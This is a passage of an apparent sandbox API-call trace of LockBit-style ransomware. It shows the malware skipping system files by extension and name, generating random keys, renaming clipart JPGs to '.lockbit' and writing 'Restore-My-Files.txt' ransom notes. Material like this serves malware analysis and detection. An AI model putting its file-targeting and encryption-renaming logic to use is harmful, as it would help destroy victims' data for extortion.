(lpString1="iconcache.db", lpString2="J0382925.JPG") returned -1 [0159.351] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.351] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382925.JPG") returned=".JPG" [0159.351] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.352] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.352] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.352] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.352] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.352] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.352] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.352] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.352] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.352] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.352] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.352] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.353] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.353] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.353] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.353] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.353] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382925.JPG.lockbit") returned 72 [0159.353] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382925.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382925.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0159.355] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.356] malloc (_Size=0x40068) returned 0x1ff1e60 [0159.356] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=118362) returned 1 [0159.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.356] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0159.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0159.357] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382925.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382925.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.362] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.362] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.363] free (_Block=0x1fa2ed8) [0159.364] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382925.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.364] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.364] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.364] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661aebd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1672c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382926.JPG", cAlternateFileName="")) returned 1 [0159.364] lstrcmpiW (lpString1=".", lpString2="J0382926.JPG") returned -1 [0159.364] lstrcmpiW (lpString1="..", lpString2="J0382926.JPG") returned -1 [0159.364] PathFindExtensionW (pszPath="J0382926.JPG") returned=".JPG" [0159.364] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.364] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.364] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.364] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.364] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.364] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.364] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.364] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.364] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.364] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.365] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.365] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.365] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.365] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.365] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.365] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.365] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.365] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.365] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.365] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.365] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.366] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.366] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.366] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.366] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.366] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.366] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.366] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382926.JPG") returned 1 [0159.366] lstrcmpiW (lpString1="ntldr", lpString2="J0382926.JPG") returned 1 [0159.366] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382926.JPG") returned 1 [0159.366] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382926.JPG") returned -1 [0159.366] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382926.JPG") returned -1 [0159.367] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382926.JPG") returned 1 [0159.367] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382926.JPG") returned -1 [0159.367] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.367] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382926.JPG") returned=".JPG" [0159.367] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.367] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.367] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.367] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.368] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.368] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382926.JPG.lockbit") returned 72 [0159.368] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382926.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382926.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0159.369] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.369] malloc (_Size=0x40068) returned 0x3f70048 [0159.369] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=91948) returned 1 [0159.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0159.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0159.371] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0159.377] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382926.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382926.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.377] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.377] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.378] free (_Block=0x1fa2ed8) [0159.379] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382926.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.379] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.379] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.379] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661aebd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f86c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382927.JPG", cAlternateFileName="")) returned 1 [0159.379] lstrcmpiW (lpString1=".", lpString2="J0382927.JPG") returned -1 [0159.379] lstrcmpiW (lpString1="..", lpString2="J0382927.JPG") returned -1 [0159.379] PathFindExtensionW (pszPath="J0382927.JPG") returned=".JPG" [0159.379] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.379] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.379] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.379] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.379] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.379] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.379] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.379] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.379] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.379] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.379] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.380] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.380] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.380] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.380] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.380] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.380] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.380] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.380] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.380] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.380] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.380] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.380] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.380] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.380] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.380] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.380] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.380] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.380] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.380] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.381] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.381] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.381] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.381] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.381] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.381] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.381] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382927.JPG") returned 1 [0159.381] lstrcmpiW (lpString1="ntldr", lpString2="J0382927.JPG") returned 1 [0159.382] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382927.JPG") returned 1 [0159.382] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382927.JPG") returned -1 [0159.382] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382927.JPG") returned -1 [0159.382] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382927.JPG") returned 1 [0159.382] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382927.JPG") returned -1 [0159.382] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.382] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382927.JPG") returned=".JPG" [0159.382] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.382] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.382] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.382] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.382] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.382] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.382] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.382] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.382] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.382] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.382] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.382] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.383] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.383] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.383] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.383] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.383] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.383] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382927.JPG.lockbit") returned 72 [0159.383] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382927.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382927.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0159.385] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.385] malloc (_Size=0x40068) returned 0x3e70008 [0159.385] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=129132) returned 1 [0159.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0159.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0159.386] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0159.392] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382927.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382927.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.392] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.392] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.393] free (_Block=0x1fa2ed8) [0159.393] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382927.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.394] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.394] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.394] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661aebd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1b83a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382930.JPG", cAlternateFileName="")) returned 1 [0159.394] lstrcmpiW (lpString1=".", lpString2="J0382930.JPG") returned -1 [0159.394] lstrcmpiW (lpString1="..", lpString2="J0382930.JPG") returned -1 [0159.394] PathFindExtensionW (pszPath="J0382930.JPG") returned=".JPG" [0159.394] 